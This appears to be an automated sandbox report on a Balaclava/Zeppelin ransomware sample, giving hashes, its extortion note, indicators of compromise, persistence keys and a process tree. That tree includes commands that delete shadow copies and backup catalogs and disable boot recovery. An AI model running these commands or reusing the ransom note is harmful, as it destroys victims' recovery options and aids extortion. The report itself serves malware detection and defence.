balaclava | f247ae6db52989c9a598c3c7fbc1ae2db54f5c65be862880e11578b8583731cb

Resubmissions

08/06/2024, 15:19 UTC

240608-sqmvesch2s 10

06/11/2020, 15:33 UTC

201106-nz68d98cw2 10

Analysis

max time kernel
153s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
08/06/2024, 15:19 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f247ae6db52989c9a598c3c7fbc1ae2db54f5c65be862880e11578b8583731cb.exe
Size

212KB
MD5

723825ad69a5d55a1e5ed3d1ee831f0d
SHA1

7e082df63c3de0f8bf9d38edf72ba5268078275a
SHA256

f247ae6db52989c9a598c3c7fbc1ae2db54f5c65be862880e11578b8583731cb
SHA512

dbd1fd80c8e1224c79ecea419919df3590186c95bfd2f606d6573d759374bc54db8331478207e3b543114431c2ed8eede83b7eca74d4313e7dee16bd527c2c78
SSDEEP

6144:tia1gMH2EXtAup5Qnqn64DQFu/U3buRKlemZ9DnGAe+hsO6a+8:tIMHxGe5Qb4DQFu/U3buRKlemZ9DnGAb

Score

10^/10

balaclava zeppelin defense_evasion execution impact persistence ransomware

Malware Config

Extracted

Path

C:\Program Files\7-Zip\Lang\RECOVERY DATA INFORMATION.TXT

Family

balaclava

Ransom Note

Hello! If you see this message - this means your files are now encrypted and are in a non-working state! Now only we can help you recover. If you are ready to restore the work - send us an email to the address decrypthelp@aol.com In the letter, specify your personal identifier, which you will see below. In the reply letter we will inform you the cost of decrypting your files. Also from your servers files, documents, databases SQL, PDF were uploaded to our cloud storage After we agree, you will receive a decryption program, as well as all your files on our server will be deleted. Otherwise, they will fall into the open access of the Internet! Before payment you can send us 1-2 files for test decryption. We will decrypt the files you requested and send you back. This ensures that we own the key to recover your data. The total file size should be no more than 3 MB, the files should not contain valuable information (databases, backups, large Excel spreadsheets ...). Please be sure that we will find common languge. We will restore all the data. Email to contact us - decrypthelp@aol.com Attention! * Do not rename encrypted files. * Do not try to decrypt your data using third party software, it may cause permanent data loss. Your personal ID: 304-BAC-7BC

Emails

decrypthelp@aol.com

Signatures

Balaclava Malware
Balaclava malware is a ransomware program.
ransomware balaclava

Detects Zeppelin payload 17 IoCs

resource	yara_rule
behavioral2/files/0x0008000000023268-24.dat	family_zeppelin
behavioral2/memory/3540-28-0x0000000000730000-0x0000000000870000-memory.dmp	family_zeppelin
behavioral2/memory/3712-51-0x0000000000800000-0x0000000000940000-memory.dmp	family_zeppelin
behavioral2/memory/3712-55-0x0000000000800000-0x0000000000940000-memory.dmp	family_zeppelin
behavioral2/memory/4340-56-0x0000000000800000-0x0000000000940000-memory.dmp	family_zeppelin
behavioral2/memory/3096-1941-0x0000000000800000-0x0000000000940000-memory.dmp	family_zeppelin
behavioral2/memory/3096-3068-0x0000000000800000-0x0000000000940000-memory.dmp	family_zeppelin
behavioral2/memory/3096-5009-0x0000000000800000-0x0000000000940000-memory.dmp	family_zeppelin
behavioral2/memory/3096-7431-0x0000000000800000-0x0000000000940000-memory.dmp	family_zeppelin
behavioral2/memory/3096-8919-0x0000000000800000-0x0000000000940000-memory.dmp	family_zeppelin
behavioral2/memory/3096-10665-0x0000000000800000-0x0000000000940000-memory.dmp	family_zeppelin
behavioral2/memory/3096-13097-0x0000000000800000-0x0000000000940000-memory.dmp	family_zeppelin
behavioral2/memory/3096-14227-0x0000000000800000-0x0000000000940000-memory.dmp	family_zeppelin
behavioral2/memory/3096-14229-0x0000000000800000-0x0000000000940000-memory.dmp	family_zeppelin
behavioral2/memory/3096-14231-0x0000000000800000-0x0000000000940000-memory.dmp	family_zeppelin
behavioral2/memory/3096-14233-0x0000000000800000-0x0000000000940000-memory.dmp	family_zeppelin
behavioral2/memory/3096-14235-0x0000000000800000-0x0000000000940000-memory.dmp	family_zeppelin

Zeppelin Ransomware
Ransomware-as-a-service (RaaS) written in Delphi and first seen in 2019.
ransomware zeppelin
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047
Renames multiple (3439) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	f247ae6db52989c9a598c3c7fbc1ae2db54f5c65be862880e11578b8583731cb.exe

Executes dropped EXE 3 IoCs

pid	Process
3712	spoolsv.exe
3096	spoolsv.exe
4340	spoolsv.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\spoolsv.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\spoolsv.exe\" -start"	f247ae6db52989c9a598c3c7fbc1ae2db54f5c65be862880e11578b8583731cb.exe

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\O:	spoolsv.exe
File opened (read-only)	\??\L:	spoolsv.exe
File opened (read-only)	\??\I:	spoolsv.exe
File opened (read-only)	\??\W:	spoolsv.exe
File opened (read-only)	\??\V:	spoolsv.exe
File opened (read-only)	\??\S:	spoolsv.exe
File opened (read-only)	\??\R:	spoolsv.exe
File opened (read-only)	\??\Q:	spoolsv.exe
File opened (read-only)	\??\G:	spoolsv.exe
File opened (read-only)	\??\A:	spoolsv.exe
File opened (read-only)	\??\Y:	spoolsv.exe
File opened (read-only)	\??\X:	spoolsv.exe
File opened (read-only)	\??\Z:	spoolsv.exe
File opened (read-only)	\??\U:	spoolsv.exe
File opened (read-only)	\??\K:	spoolsv.exe
File opened (read-only)	\??\E:	spoolsv.exe
File opened (read-only)	\??\B:	spoolsv.exe
File opened (read-only)	\??\H:	spoolsv.exe
File opened (read-only)	\??\T:	spoolsv.exe
File opened (read-only)	\??\P:	spoolsv.exe
File opened (read-only)	\??\N:	spoolsv.exe
File opened (read-only)	\??\M:	spoolsv.exe
File opened (read-only)	\??\J:	spoolsv.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
40	iplogger.org
38	iplogger.org

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
2	geoiptool.com

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\7-Zip\Lang\ka.txt	spoolsv.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019VL_MAK_AE-ppd.xrm-ms	spoolsv.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\Edit@3x.png	spoolsv.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\Fonts\private\JUICE___.TTF	spoolsv.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\PROOF\MSWDS_FR.LEX.304-BAC-7BC	spoolsv.exe
File opened for modification	C:\Program Files\Java\jre-1.8\lib\ext\sunpkcs11.jar	spoolsv.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_OEM_Perp2-ul-phn.xrm-ms	spoolsv.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp3-ul-phn.xrm-ms	spoolsv.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\wordicon.exe.304-BAC-7BC	spoolsv.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-040C-1000-0000000FF1CE}\misc.exe.304-BAC-7BC	spoolsv.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019R_Trial-pl.xrm-ms.304-BAC-7BC	spoolsv.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\GRPHFLT\MS.WPG	spoolsv.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\pt_PT\LC_MESSAGES\vlc.mo	spoolsv.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalR_OEM_Perp-ppd.xrm-ms.304-BAC-7BC	spoolsv.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\RIPPLE\PREVIEW.GIF.304-BAC-7BC	spoolsv.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ExcelR_OEM_Perp-pl.xrm-ms.304-BAC-7BC	spoolsv.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\MondoR_SubTest2-ul-oob.xrm-ms.304-BAC-7BC	spoolsv.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_Subscription1-ul-oob.xrm-ms	spoolsv.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTrial4-pl.xrm-ms	spoolsv.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectProO365R_Subscription-ppd.xrm-ms	spoolsv.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioProCO365R_SubTrial-ppd.xrm-ms.304-BAC-7BC	spoolsv.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\MSIPC\bg\msipc.dll.mui.304-BAC-7BC	spoolsv.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL002.XML	spoolsv.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Excel2019VL_MAK_AE-pl.xrm-ms.304-BAC-7BC	spoolsv.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\EXCEL_WHATSNEW.XML.304-BAC-7BC	spoolsv.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_SubTrial2-ppd.xrm-ms	spoolsv.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\mscss7cm_fr.dub	spoolsv.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL102.XML.304-BAC-7BC	spoolsv.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN102.XML	spoolsv.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\OutlookR_OEM_Perp-ppd.xrm-ms.304-BAC-7BC	spoolsv.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioProR_Retail-ul-phn.xrm-ms.304-BAC-7BC	spoolsv.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\excel.exe.manifest	spoolsv.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL001.XML	spoolsv.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgeCalls.c	spoolsv.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\legal\javafx\jpeg_fx.md.304-BAC-7BC	spoolsv.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ExcelR_Grace-ul-oob.xrm-ms.304-BAC-7BC	spoolsv.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogoSmall.scale-80.png.304-BAC-7BC	spoolsv.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\lib\security\cacerts.304-BAC-7BC	spoolsv.exe
File opened for modification	C:\Program Files\Java\jre-1.8\lib\ext\nashorn.jar	spoolsv.exe
File created	C:\Program Files\Microsoft Office\root\Office16\1033\RECOVERY DATA INFORMATION.TXT	spoolsv.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogoSmall.scale-100.png.304-BAC-7BC	spoolsv.exe
File opened for modification	C:\Program Files\7-Zip\Lang\fr.txt.304-BAC-7BC	spoolsv.exe
File opened for modification	C:\Program Files\Java\jre-1.8\lib\management-agent.jar.304-BAC-7BC	spoolsv.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectProR_Trial-ul-oob.xrm-ms.304-BAC-7BC	spoolsv.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\dialogs\equalizer_window.html	spoolsv.exe
File created	C:\Program Files\VideoLAN\VLC\locale\it\LC_MESSAGES\RECOVERY DATA INFORMATION.TXT	spoolsv.exe
File opened for modification	C:\Program Files\Java\jre-1.8\lib\security\policy\limited\local_policy.jar.304-BAC-7BC	spoolsv.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_Retail-ul-oob.xrm-ms	spoolsv.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-linkedentity@4x.png	spoolsv.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\Fonts\private\ARIALN.TTF	spoolsv.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\INDUST\RECOVERY DATA INFORMATION.TXT	spoolsv.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ga.txt.304-BAC-7BC	spoolsv.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Subscription1-pl.xrm-ms	spoolsv.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\en-us\RECOVERY DATA INFORMATION.TXT	spoolsv.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\outicon.exe.304-BAC-7BC	spoolsv.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\policytool.exe.304-BAC-7BC	spoolsv.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\TellMeWord.nrr.304-BAC-7BC	spoolsv.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\WINWORD_F_COL.HXK.304-BAC-7BC	spoolsv.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\klist.exe	spoolsv.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\GRPHFLT\GIFIMP32.FLT	spoolsv.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Cartridges\orcl7.xsl	spoolsv.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\PROOF\MSWDS_ES.LEX.304-BAC-7BC	spoolsv.exe
File opened for modification	C:\Program Files\Microsoft Office\root\fre\StartMenu_Win10_RTL.mp4	spoolsv.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0C0A-1000-0000000FF1CE}\misc.exe.304-BAC-7BC	spoolsv.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	1760	WMIC.exe
Token: SeSecurityPrivilege	1760	WMIC.exe
Token: SeTakeOwnershipPrivilege	1760	WMIC.exe
Token: SeLoadDriverPrivilege	1760	WMIC.exe
Token: SeSystemProfilePrivilege	1760	WMIC.exe
Token: SeSystemtimePrivilege	1760	WMIC.exe
Token: SeProfSingleProcessPrivilege	1760	WMIC.exe
Token: SeIncBasePriorityPrivilege	1760	WMIC.exe
Token: SeCreatePagefilePrivilege	1760	WMIC.exe
Token: SeBackupPrivilege	1760	WMIC.exe
Token: SeRestorePrivilege	1760	WMIC.exe
Token: SeShutdownPrivilege	1760	WMIC.exe
Token: SeDebugPrivilege	1760	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1760	WMIC.exe
Token: SeRemoteShutdownPrivilege	1760	WMIC.exe
Token: SeUndockPrivilege	1760	WMIC.exe
Token: SeManageVolumePrivilege	1760	WMIC.exe
Token: 33	1760	WMIC.exe
Token: 34	1760	WMIC.exe
Token: 35	1760	WMIC.exe
Token: 36	1760	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3544	WMIC.exe
Token: SeSecurityPrivilege	3544	WMIC.exe
Token: SeTakeOwnershipPrivilege	3544	WMIC.exe
Token: SeLoadDriverPrivilege	3544	WMIC.exe
Token: SeSystemProfilePrivilege	3544	WMIC.exe
Token: SeSystemtimePrivilege	3544	WMIC.exe
Token: SeProfSingleProcessPrivilege	3544	WMIC.exe
Token: SeIncBasePriorityPrivilege	3544	WMIC.exe
Token: SeCreatePagefilePrivilege	3544	WMIC.exe
Token: SeBackupPrivilege	3544	WMIC.exe
Token: SeRestorePrivilege	3544	WMIC.exe
Token: SeShutdownPrivilege	3544	WMIC.exe
Token: SeDebugPrivilege	3544	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3544	WMIC.exe
Token: SeRemoteShutdownPrivilege	3544	WMIC.exe
Token: SeUndockPrivilege	3544	WMIC.exe
Token: SeManageVolumePrivilege	3544	WMIC.exe
Token: 33	3544	WMIC.exe
Token: 34	3544	WMIC.exe
Token: 35	3544	WMIC.exe
Token: 36	3544	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1760	WMIC.exe
Token: SeSecurityPrivilege	1760	WMIC.exe
Token: SeTakeOwnershipPrivilege	1760	WMIC.exe
Token: SeLoadDriverPrivilege	1760	WMIC.exe
Token: SeSystemProfilePrivilege	1760	WMIC.exe
Token: SeSystemtimePrivilege	1760	WMIC.exe
Token: SeProfSingleProcessPrivilege	1760	WMIC.exe
Token: SeIncBasePriorityPrivilege	1760	WMIC.exe
Token: SeCreatePagefilePrivilege	1760	WMIC.exe
Token: SeBackupPrivilege	1760	WMIC.exe
Token: SeRestorePrivilege	1760	WMIC.exe
Token: SeShutdownPrivilege	1760	WMIC.exe
Token: SeDebugPrivilege	1760	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1760	WMIC.exe
Token: SeRemoteShutdownPrivilege	1760	WMIC.exe
Token: SeUndockPrivilege	1760	WMIC.exe
Token: SeManageVolumePrivilege	1760	WMIC.exe
Token: 33	1760	WMIC.exe
Token: 34	1760	WMIC.exe
Token: 35	1760	WMIC.exe
Token: 36	1760	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3544	WMIC.exe

Suspicious use of WriteProcessMemory 33 IoCs

description	pid	Process	procid_target
PID 3540 wrote to memory of 3712	3540	f247ae6db52989c9a598c3c7fbc1ae2db54f5c65be862880e11578b8583731cb.exe	91
PID 3540 wrote to memory of 3712	3540	f247ae6db52989c9a598c3c7fbc1ae2db54f5c65be862880e11578b8583731cb.exe	91
PID 3540 wrote to memory of 3712	3540	f247ae6db52989c9a598c3c7fbc1ae2db54f5c65be862880e11578b8583731cb.exe	91
PID 3712 wrote to memory of 3308	3712	spoolsv.exe	100
PID 3712 wrote to memory of 3308	3712	spoolsv.exe	100
PID 3712 wrote to memory of 3308	3712	spoolsv.exe	100
PID 3712 wrote to memory of 404	3712	spoolsv.exe	101
PID 3712 wrote to memory of 404	3712	spoolsv.exe	101
PID 3712 wrote to memory of 404	3712	spoolsv.exe	101
PID 3712 wrote to memory of 3052	3712	spoolsv.exe	102
PID 3712 wrote to memory of 3052	3712	spoolsv.exe	102
PID 3712 wrote to memory of 3052	3712	spoolsv.exe	102
PID 3712 wrote to memory of 1864	3712	spoolsv.exe	103
PID 3712 wrote to memory of 1864	3712	spoolsv.exe	103
PID 3712 wrote to memory of 1864	3712	spoolsv.exe	103
PID 3712 wrote to memory of 3332	3712	spoolsv.exe	104
PID 3712 wrote to memory of 3332	3712	spoolsv.exe	104
PID 3712 wrote to memory of 3332	3712	spoolsv.exe	104
PID 3712 wrote to memory of 2300	3712	spoolsv.exe	105
PID 3712 wrote to memory of 2300	3712	spoolsv.exe	105
PID 3712 wrote to memory of 2300	3712	spoolsv.exe	105
PID 3712 wrote to memory of 3096	3712	spoolsv.exe	106
PID 3712 wrote to memory of 3096	3712	spoolsv.exe	106
PID 3712 wrote to memory of 3096	3712	spoolsv.exe	106
PID 3712 wrote to memory of 4340	3712	spoolsv.exe	107
PID 3712 wrote to memory of 4340	3712	spoolsv.exe	107
PID 3712 wrote to memory of 4340	3712	spoolsv.exe	107
PID 3308 wrote to memory of 3544	3308	cmd.exe	114
PID 3308 wrote to memory of 3544	3308	cmd.exe	114
PID 3308 wrote to memory of 3544	3308	cmd.exe	114
PID 2300 wrote to memory of 1760	2300	cmd.exe	115
PID 2300 wrote to memory of 1760	2300	cmd.exe	115
PID 2300 wrote to memory of 1760	2300	cmd.exe	115

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\f247ae6db52989c9a598c3c7fbc1ae2db54f5c65be862880e11578b8583731cb.exe
"C:\Users\Admin\AppData\Local\Temp\f247ae6db52989c9a598c3c7fbc1ae2db54f5c65be862880e11578b8583731cb.exe"
1⤵
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3540
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\spoolsv.exe
  "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\spoolsv.exe" -start
  2⤵
  - Executes dropped EXE
  - Enumerates connected drives
  - Suspicious use of WriteProcessMemory
  PID:3712
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3308
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic shadowcopy delete
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3544
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
    3⤵
    PID:404
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
    3⤵
    PID:3052
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
    3⤵
    PID:1864
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
    3⤵
    PID:3332
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2300
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic shadowcopy delete
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1760
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\spoolsv.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\spoolsv.exe" -agent 0
    3⤵
    - Executes dropped EXE
    - Drops file in Program Files directory
    PID:3096
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\spoolsv.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\spoolsv.exe" -agent 1
    3⤵
    - Executes dropped EXE
    PID:4340

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:3084

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4092 --field-trial-handle=2280,i,4114443225282860369,4764091921472631035,262144 --variations-seed-version /prefetch:8
1⤵
PID:2204

Network

DNS

geoiptool.com

spoolsv.exe

Remote address:

8.8.8.8:53

Request

geoiptool.com

IN A

Response

geoiptool.com

IN A

104.21.50.146

geoiptool.com

IN A

172.67.207.3
GET

http://geoiptool.com/

f247ae6db52989c9a598c3c7fbc1ae2db54f5c65be862880e11578b8583731cb.exe

Remote address:

104.21.50.146:80

Request

GET / HTTP/1.1
Host: geoiptool.com

Response

HTTP/1.1 301 Moved Permanently

Date: Sat, 08 Jun 2024 15:20:47 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Location: https://www.geodatatool.com/
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P8QR914jd1OtX8Fh1kqFDzRs6nPEpJIbss%2FbGTpcy7M7a67gE1wZUBg%2F8JAyhehQeTYdv55deIFRgxxn1CXVLgb3ZgtbCXTk9l3BnA7FOne7wFfFTeOHM7ElgmME6gO7"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8909de32bcfe48c8-LHR
alt-svc: h3=":443"; ma=86400
DNS

www.geodatatool.com

spoolsv.exe

Remote address:

8.8.8.8:53

Request

www.geodatatool.com

IN A

Response

www.geodatatool.com

IN A

158.69.65.151
GET

https://www.geodatatool.com/

f247ae6db52989c9a598c3c7fbc1ae2db54f5c65be862880e11578b8583731cb.exe

Remote address:

158.69.65.151:443

Request

GET / HTTP/1.1
Host: www.geodatatool.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx/1.6.2
Date: Sat, 08 Jun 2024 15:21:31 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 18913
Connection: keep-alive
Vary: Accept-Encoding
DNS

146.50.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

146.50.21.104.in-addr.arpa

IN PTR

Response
DNS

151.65.69.158.in-addr.arpa

Remote address:

8.8.8.8:53

Request

151.65.69.158.in-addr.arpa

IN PTR

Response
DNS

149.220.183.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

149.220.183.52.in-addr.arpa

IN PTR

Response
DNS

crl.usertrust.com

f247ae6db52989c9a598c3c7fbc1ae2db54f5c65be862880e11578b8583731cb.exe

Remote address:

8.8.8.8:53

Request

crl.usertrust.com

IN A

Response

crl.usertrust.com

IN CNAME

crl.comodoca.com.cdn.cloudflare.net

crl.comodoca.com.cdn.cloudflare.net

IN A

172.64.149.23

crl.comodoca.com.cdn.cloudflare.net

IN A

104.18.38.233
GET

http://crl.usertrust.com/GoGetSSLRSADVCA.crl

f247ae6db52989c9a598c3c7fbc1ae2db54f5c65be862880e11578b8583731cb.exe

Remote address:

172.64.149.23:80

Request

GET /GoGetSSLRSADVCA.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: crl.usertrust.com

Response

HTTP/1.1 200 OK

Date: Sat, 08 Jun 2024 15:20:49 GMT
Content-Type: application/pkix-crl
Content-Length: 147734
Connection: keep-alive
Last-Modified: Sat, 08 Jun 2024 06:29:38 GMT
Expires: Sat, 15 Jun 2024 06:29:38 GMT
Etag: "c31d1841e1f555b1f7b475368e2d515fa7753324"
Cache-Control: max-age=603456,s-maxage=3600,public,no-transform,must-revalidate
X-CCACDN-Proxy-ID: mcdpinlb3
X-Frame-Options: SAMEORIGIN
CF-Cache-Status: HIT
Age: 1534
Accept-Ranges: bytes
Server: cloudflare
CF-RAY: 8909de3c9ee879b3-LHR
DNS

216.197.17.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

216.197.17.2.in-addr.arpa

IN PTR

Response

216.197.17.2.in-addr.arpa

IN PTR

a2-17-197-216deploystaticakamaitechnologiescom
DNS

233.38.18.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

233.38.18.104.in-addr.arpa

IN PTR

Response
DNS

23.149.64.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

23.149.64.172.in-addr.arpa

IN PTR

Response
DNS

72.32.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

72.32.126.40.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
GET

http://geoiptool.com/

spoolsv.exe

Remote address:

104.21.50.146:80

Request

GET / HTTP/1.1
Host: geoiptool.com

Response

HTTP/1.1 301 Moved Permanently

Date: Sat, 08 Jun 2024 15:20:51 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Location: https://www.geodatatool.com/
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PWYAUDkGdfBvWz%2Fb0xs82%2B4uAbx8%2FSBfomx4TpWPFa9nGX8fIxmpxcgnyLzMQWs893NQcAPu95EjehAvD%2F%2Bq0NzpTTIiJUWN09WlbZSsgtg6RNuLatJdZhc0QoYY77cx"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8909de4b8ef823dc-LHR
alt-svc: h3=":443"; ma=86400
GET

https://www.geodatatool.com/

spoolsv.exe

Remote address:

158.69.65.151:443

Request

GET / HTTP/1.1
Host: www.geodatatool.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx/1.6.2
Date: Sat, 08 Jun 2024 15:21:34 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 18913
Connection: keep-alive
